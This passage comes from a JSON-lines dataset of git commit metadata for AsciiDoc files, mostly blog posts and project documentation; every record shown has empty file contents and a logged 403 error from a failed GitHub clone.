note\n","repos":"xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12373_disappearing_masl.int.adoc","new_file":"doc-bridgepoint\/notes\/12373_disappearing_masl.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"929c650601a4635c2ef7c8c374820df1d6acff6e","subject":"Add note about JDK9","message":"Add note about JDK9\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f913476640152b1774b81f3a2fa36a9552c8ca8a","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8848d7ace48dc61acc1bd0e64b59de3733c9a86","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf05bbd719c9e3faaee03908616f2183cfc828bc","subject":"Update 2016-08-09.adoc","message":"Update 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09.adoc","new_file":"_posts\/2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aff7292002b25686e2f8e3f44d3ec1aa0fd9d55","subject":"y2b create post I've Never Seen Anything Like It...","message":"y2b create post I've Never Seen Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-05-Ive-Never-Seen-Anything-Like-It.adoc","new_file":"_posts\/2017-02-05-Ive-Never-Seen-Anything-Like-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f9f67c80eafd4556cf2e6850bf52cf61fc35105","subject":"y2b create post Note 5 - S Pen Rant!","message":"y2b create post Note 5 - S Pen Rant!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-23-Note-5--S-Pen-Rant.adoc","new_file":"_posts\/2015-08-23-Note-5--S-Pen-Rant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea8770261d57279332a0138c6b97eab72ad6ba34","subject":"Renamed '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc' to '_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc'","message":"Renamed '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc' to '_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"050fbc8f3d9d67cfaf355f9e047d332f1ed04285","subject":"Docs: Fix description of percentile ranks example example (#31652)","message":"Docs: Fix description of percentile ranks example example (#31652)\n\n","repos":"scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/aggregations\/metrics\/percentile-rank-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/metrics\/percentile-rank-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d88467efb73e224061ada816dd8b2ec73a417a38","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09dbdfe538e8a022adbb2787d821b884565517af","subject":"Update 2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","message":"Update 2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","new_file":"_posts\/2018-08-29-Comment-amener-une-ESN-vers-la-contribution-open-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5391386f63b044ced7dc4feb23bbec26ec650f0f","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b9edfb341d3d98a66a665909277eda1801e9094","subject":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin","message":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210429-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210429-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5469875c192474fe9c9416d2d34ee536d5f5824","subject":"y2b create post XBOX 360, PS3, Black Ops 2, Halo 4 Giveaway - 4 Prizes!","message":"y2b create post XBOX 360, PS3, Black Ops 2, Halo 4 Giveaway - 4 Prizes!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-21-XBOX-360-PS3-Black-Ops-2-Halo-4-Giveaway--4-Prizes.adoc","new_file":"_posts\/2012-12-21-XBOX-360-PS3-Black-Ops-2-Halo-4-Giveaway--4-Prizes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"459d690cf937fea1008eaba44eb688025b27423d","subject":"Updated doc - added processor configuration","message":"Updated doc - added processor configuration","repos":"peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,rashidaligee\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,Teradata\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo","old_file":"docs\/latest\/security\/authorization\/ranger\/EnableRangerAuthorization.adoc","new_file":"docs\/latest\/security\/authorization\/ranger\/EnableRangerAuthorization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/claudiu-stanciu\/kylo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e8b83d53dcf44634cebe9334363c70189987463","subject":"y2b create post iPhone 5c Drop Test (Shot Using 120fps Slo-Mo on iPhone 5s)","message":"y2b create post iPhone 5c Drop Test (Shot Using 120fps Slo-Mo on iPhone 5s)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-21-iPhone-5c-Drop-Test-Shot-Using-120fps-SloMo-on-iPhone-5s.adoc","new_file":"_posts\/2013-09-21-iPhone-5c-Drop-Test-Shot-Using-120fps-SloMo-on-iPhone-5s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41001c8534c6d9aad2bccb4b8204ada3ca1a54e","subject":"Update 2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","message":"Update 2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","new_file":"_posts\/2015-07-20-A-world-where-1ms-is-worth-100-millions-euros.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9125a871ea295bd61986ee6c01a3a2cf36ec8e8e","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"049ca8cd9f39b621c8b2c734f0c1a16abd41e1be","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6edd4dfbcfdc433496171bf2afac0d94735dd864","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d5349ce2d07a5fa91bbaec8a23377ffbb4275ce","subject":"y2b create post Lacie 2big Quadra Unboxing \\u0026 Overview in HD!","message":"y2b create post Lacie 2big Quadra Unboxing \\u0026 Overview in HD!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-21-Lacie-2big-Quadra-Unboxing-u0026-Overview-in-HD.adoc","new_file":"_posts\/2011-01-21-Lacie-2big-Quadra-Unboxing-u0026-Overview-in-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19de00d798c1c52e291f6ff99dfa072d830d6cdb","subject":"Add initial architecture documentation","message":"Add initial architecture documentation\n","repos":"tnozicka\/openshift-acme,tnozicka\/openshift-acme","old_file":"docs\/design\/architecture.adoc","new_file":"docs\/design\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tnozicka\/openshift-acme.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ea1aa409e19869f4f37a451dd5585f072ac7c6c","subject":"Update 2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","message":"Update 2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","new_file":"_posts\/2011-09-30-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5616f326b214bc728964740f8be7f7a9ed819dc","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c91a6a0f2fb084f72ff7da144d6777dc19ba0c69","subject":"Update 2016-11-10-184600-Thursday-Workday.adoc","message":"Update 2016-11-10-184600-Thursday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-184600-Thursday-Workday.adoc","new_file":"_posts\/2016-11-10-184600-Thursday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbab69e9f0d3d0560f858788cd8082dd5326b32c","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68f256d74a0293c18e1c12ac825f312f36faa0e7","subject":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ddbaf341bc008569ce3598bfd3a476c9d20d668","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a581e1e5c3b64536f266811827ae8f0096b3dea3","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc3530365f2b8fe9f47d0014925e2b3642ce26cd","subject":"Update 2016-10-29.adoc","message":"Update 2016-10-29.adoc","repos":"livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io","old_file":"_posts\/2016-10-29.adoc","new_file":"_posts\/2016-10-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/livehua\/livehua.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f8387276073cd4d2c04426056bec5119b815805","subject":"Update 2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","message":"Update 2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","new_file":"_posts\/2015-04-03-Presentation-Data-Mobility-chez-Sup-Info-Paris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"416f0d17ea840c3a10cc61dbc28bcda2354984bd","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02906b6e47d67aaae6ec4fc3c25f65a320ba6b26","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed1b0d1c6c0683419c7261a1f50a035a7f971b6","subject":"Add README file","message":"Add README file\n","repos":"kprovost\/qinotify","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kprovost\/qinotify.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d999dd2b88c0cb32e43ce21c6d93ca5a9ae51014","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b1317b18589c45c63c4a1cf84ac74fe14213c81","subject":"Update 2015-06-18-Weeeeeeee.adoc","message":"Update 2015-06-18-Weeeeeeee.adoc","repos":"Arttii\/arttii.github.io,Arttii\/arttii.github.io,Arttii\/arttii.github.io","old_file":"_posts\/2015-06-18-Weeeeeeee.adoc","new_file":"_posts\/2015-06-18-Weeeeeeee.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Arttii\/arttii.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3009d513d01a3ddae71293b5661951a4fa1ca31","subject":"Create _using-rest-api.adoc","message":"Create _using-rest-api.adoc","repos":"camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/_using-rest-api.adoc","new_file":"docs\/src\/main\/asciidoc\/_using-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edc196a943fe366f70087233c1c18019de3ba50a","subject":"Moved from the verbose DocBook format, to AsciiDoc format. Also updated the documentation to remove SSL setup for Tomcat, since that task in no longer required.","message":"Moved from the verbose DocBook format, to AsciiDoc format. Also updated the documentation to remove SSL setup for Tomcat, since that task in no longer required.\n\n","repos":"jsons\/eureka,candyam5522\/eureka,candyam5522\/eureka,candyam5522\/eureka","old_file":"docs\/eureka_install_guide.adoc","new_file":"docs\/eureka_install_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsons\/eureka.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db896941c7643c42c7bdde314cf10528b48fe997","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00fe77e54fbace22e0985a27dffd6539f36dd04c","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-weather\/README.adoc","new_file":"plugins\/boteco-plugin-weather\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 